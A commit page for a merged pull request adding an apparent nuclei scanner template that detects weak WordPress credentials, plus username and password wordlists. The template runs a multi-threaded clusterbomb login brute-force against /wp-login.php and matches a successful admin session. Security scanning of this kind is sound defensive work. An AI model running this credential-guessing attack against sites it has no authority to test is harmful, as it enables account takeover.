Merge pull request #2465 from projectdiscovery/wordpress-weak-credentials

Added WordPress Weak Credentials Detection
patch-1
Sandeep Singh 2021-08-23 17:23:38 +05:30 committed by GitHub
commit d9ec41e2e5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 71 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: wordpress-weak-credentials
info:
name: WordPress Weak Credentials
author: evolutionsec
severity: critical
tags: wordpress,default-login,fuzz
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}
log={{users}}&pwd={{passwords}}
payloads:
users: helpers/wordlists/wp-users.txt
passwords: helpers/wordlists/wp-passwords.txt
threads: 50
attack: clusterbomb
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
words:
- '/wp-admin'
- 'wordpress_logged_in'
condition: and
part: header

View File

@ -0,0 +1,23 @@
admin
123456
password
12345678
666666
111111
1234567
qwerty
siteadmin
administrator
root
123123
123321
1234567890
letmein123
test123
demo123
pass123
123qwe
qwe123
654321
loveyou
adminadmin123

View File

@ -0,0 +1,11 @@
adm
admin
user
admin1
hostname
manager
qwerty
root
support
sysadmin
test